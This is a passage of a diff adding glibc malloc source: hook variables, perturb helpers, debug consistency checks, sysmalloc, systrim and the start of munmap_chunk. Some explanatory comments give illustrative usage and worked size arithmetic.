+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
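+
+/*
+  Illustrative usage sketch (not part of this file): perturb_byte is
+  normally set through the M_PERTURB mallopt parameter (or the
+  MALLOC_PERTURB_ environment variable), which makes freshly allocated and
+  freed memory easy to spot when chasing use-of-uninitialized or
+  use-after-free bugs.
+
+    #include <malloc.h>
+
+    mallopt (M_PERTURB, 0xaa);  // allocations filled with 0x55, freed memory with 0xaa
+*/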
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc, in which case please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum), this only
+         happens for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
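+
+/*
+   Illustration only: as the comment before this routine suggests, it
+   can be hacked to print chunks instead of merely asserting on them.
+   One minimal sketch, using only accessors already defined in this
+   file, is to extend the fastbin walk with:
+
+     for (i = 0; i < NFASTBINS; ++i)
+       for (p = fastbin (av, i); p != 0; p = p->fd)
+         fprintf (stderr, "fastbin[%d]: chunk=%p size=%#lx\n",
+                  i, (void *) p, (unsigned long) chunksize (p));
+ */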
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignments unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
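+
+      /*
+         Worked example (one plausible 64-bit layout, SIZE_SZ == 8 and a
+         0x1000-byte page): a request with nb == 0x20010 becomes
+         ALIGN_UP (0x20010 + 8, 0x1000) == 0x21000, i.e. whole pages
+         with room left over for the chunk header.
+       */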
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
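+
+/*
+   Example of the final split above (illustrative numbers): if the
+   grown top chunk is 0x21000 bytes and nb == 0x20, the caller's chunk
+   keeps the first 0x20 bytes of the old top and the remaining 0x20fe0
+   bytes become the new top, with PREV_INUSE set in both headers.
+ */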
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
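+
+/*
+   Illustrative arithmetic (typical 64-bit build, MINSIZE == 0x20,
+   0x1000-byte pages): with a 0x22000-byte top chunk and pad == 0x20000,
+   top_area is 0x21fdf and extra becomes ALIGN_DOWN (0x1fdf, 0x1000) ==
+   0x1000, so one page is handed back via MORECORE (-extra), provided
+   the break has not been moved by a foreign sbrk in the meantime.
+ */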
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         or if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t mem = (uintptr_t) chunk2mem (p);
